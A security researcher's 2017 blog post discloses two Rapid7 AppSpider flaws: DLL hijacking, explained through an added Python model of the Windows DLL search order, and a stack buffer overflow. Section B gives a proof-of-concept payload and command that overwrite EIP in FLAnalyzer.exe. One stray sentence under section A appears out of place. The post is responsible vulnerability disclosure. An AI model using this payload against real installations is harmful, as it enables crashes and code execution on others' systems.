May 16, 2017 Karn Ganeshen

Rapid7 AppSpider vulnerabilities

Recently, I checked out Rapid7’s AppSpider Web Application Testing software. It is a Windows-based application, and the demo version is available for anyone to play with.

Web Application Security Testing with AppSpider | Rapid7
https://www.rapid7.com/products/appspider/

ABOUT

I found 2 vulnerabilities in AppSpider – DLL Pre-loading & Buffer overflow – which I then reported privately to the R7 team. The folks at Rapid7 confirmed my reports and released the new versions shortly after.

The Release Announcement is available here – https://community.rapid7.com/docs/DOC-3631

  • Updated nginx.exe to utilize Microsoft Security Advisory on remote code execution. Windows 7, Windows Server 2008 R2, Windows Vista and Windows Server 2008: KB2533623 must be installed on the target platform. Resolves – CVE-2017-5236
  • Resolved buffer overflow crash in the AppSpider command line tool for inputs. Resolves – CVE-2017-5240

Rapid7 thanks Karn Ganeshen for privately reporting the CVE issues. – w00t w00t!

VULNERABILITY OVERVIEW
A. Rapid7 AppSpider Insecure Library Load (DLL Hijacking) Vulnerability – CVE-2017-5236

Shell does not disconnect after setup completes.
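The release note above ties the DLL pre-loading fix to KB2533623, the update that lets a program restrict DLL lookups to System32 instead of the default search order. The following is an added example, not code from this post or from Rapid7: it models the Windows DLL search order and reports which DLLs of a program would be resolved from a user-writable directory under each mode. All paths and DLL names are constructed sample values.

```python
# Added example: a model of the Windows DLL search order behind CVE-2017-5236.
# All paths and DLL names are constructed sample values, not AppSpider's layout.
from typing import Dict, List, Optional

SYSTEM32 = r"C:\Windows\System32"
WINDOWS_DIRS = [SYSTEM32, r"C:\Windows\System", r"C:\Windows"]


def search_order(app_dir: str, cwd: str, path_dirs: List[str],
                 safe_search_mode: bool = True,
                 system32_only: bool = False) -> List[str]:
    """Directories Windows consults, in order, for a DLL that is neither
    already loaded nor a KnownDLL. system32_only models the opt-in that
    KB2533623 made available (SetDefaultDllDirectories with
    LOAD_LIBRARY_SEARCH_SYSTEM32): app dir, CWD and PATH are skipped."""
    if system32_only:
        return [SYSTEM32]
    if safe_search_mode:  # SafeDllSearchMode=1, the default on supported Windows
        return [app_dir, *WINDOWS_DIRS, cwd, *path_dirs]
    return [app_dir, cwd, *WINDOWS_DIRS, *path_dirs]  # legacy order: CWD second


def exposure(dll: str, order: List[str], present: Dict[str, List[str]],
             writable: List[str]) -> Optional[str]:
    """First directory in the search order that a low-privileged user can
    write to and that is reached before the legitimate copy of `dll`, or
    None when the legitimate copy wins. A DLL installed nowhere (e.g. an
    optional delay-loaded one) is exposed by any writable directory."""
    for d in order:
        if dll in present.get(d, []):
            return None          # legitimate copy found first: safe
        if d in writable:
            return d             # a file placed here would be loaded instead
    return None


def audit(dlls: List[str], order: List[str], present: Dict[str, List[str]],
          writable: List[str]) -> Dict[str, str]:
    """Map each DLL to the writable directory that exposes it, if any."""
    found = {dll: exposure(dll, order, present, writable) for dll in dlls}
    return {dll: d for dll, d in found.items() if d}


# Constructed scenario: a tool under Program Files, launched with a user's
# Downloads folder as CWD, loading one DLL that lives in System32 and one
# optional DLL that is installed nowhere.
APP_DIR = r"C:\Program Files\ExampleApp"
DOWNLOADS = r"C:\Users\alice\Downloads"
PRESENT = {SYSTEM32: ["version.dll"]}
WRITABLE = [DOWNLOADS]
DLLS = ["version.dll", "optional.dll"]
```

Running `audit(DLLS, search_order(APP_DIR, DOWNLOADS, []), PRESENT, WRITABLE)` shows that even with the default safe order the missing optional DLL is still exposed through the CWD, and only the System32-only mode leaves nothing exposed.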

B. Rapid7 AppSpider Stack Buffer Overflow Vulnerability – CVE-2017-5240

Vulnerable component
FLAnalyzer.exe

Payload
"A"*4040 + "B"*4 + "C"*5956

PoC -> EIP control
C:\Program Files\Rapid7\AppSpider6\ScanEngine> FLAnalyzer.exe <payload>

+++++
